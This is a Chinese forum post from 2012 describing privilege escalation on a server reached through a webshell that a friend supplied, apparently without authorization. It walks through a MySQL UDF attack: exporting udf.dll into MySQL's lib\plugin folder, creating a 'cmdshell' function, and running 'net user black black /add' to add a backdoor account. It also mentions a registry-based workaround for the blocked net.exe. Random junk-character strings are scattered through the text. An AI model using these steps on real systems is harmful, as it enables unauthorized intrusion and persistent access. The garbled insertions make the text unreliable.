朋友丢了一个webshell让我提权...我无聊就进去逛了下!全部是asp的...而且权限小的可怜几乎什么也做不了!
, ^) K" g9 s0 Q* B) d' _- ~. R. k! A5 e1 j/ g4 k# }$ s
于是无聊在D盘乱翻!终于看见一个php的网站!寻找conn.php竟然意外发现是root权限!, c1 G6 O! W' a
% i! L7 V' o% c& w3 t3 c1 Q/ s
哈哈.小兴奋一下.立即上传udf.dll.php提权!因为是Mysql5.1版本且服务器是windows2003的/ g2 D! t$ t8 k& P; W/ o1 \
. l# S' b8 q0 S1 y( S9 ^
因此导入到以下路径:C:\\Windows\\udf.dll [显示导出成功]!6 O* h5 m: B t; L. X4 Q1 m
% u5 |$ g( K) s7 c) {+ D继续执行命令:create function cmdshell returns string soname 'udf.dll'1 z0 U6 n$ N5 P E4 w6 x% U
$ ^8 ~ O# }/ w8 @. c
杯具出现了:Can't open shared library 'udf.dll'
2 Q" F4 J9 O, j$ }$ t9 J. x1 ?: e- [( o$ x1 ^' J4 O, Q7 F3 `
于是乎又满天的找解决办法.现与大家一起分享:
# Q* ^/ h% }3 E) _+ e) C% S6 q6 N
9 l" D; e; h2 I E! W从MYSQL 5.1版本开始必须要把udf.dll文件放到MYSQL安装目录下的lib\plugin文件夹下才能创建自定义函数,并且该目录默认是不存在的,这就需要我们使用webshell找到MYSQL的安装目录,并在安装目录下创建lib\plugin文件夹,然后将udf.dll文件导出到该目录即可。( ]8 T: T' _ j8 D
' U- Z7 U2 Z0 N2 g3 W! e
OK,问题解决了!准备添加用户:select cmdshell('net user black black /add');
$ r& Q) L' B, @5 \( W- z2 F; a8 P1 m, v4 _
又一次杯具的失败了!摸索原因才知道服务器管理员禁止.Net.exe和Net1.exe了!+ }) b+ f! g; W* {
/ Z4 j& N4 G9 \7 \
但是意外的发现可以执行其他命令!
1 g& y" n; f. ~. d8 M! `/ t5 Z; k& x3 e. r1 d% F; W# L$ r
于是乎写了一个bat文件,通过注册表来完成下面的工作![遇见问题一定要全方位多思考.通过其他思路寻找突破]; G# m6 ?" S. @" \
|
发表于 2012-11-1 13:31:52
收藏
支持
反对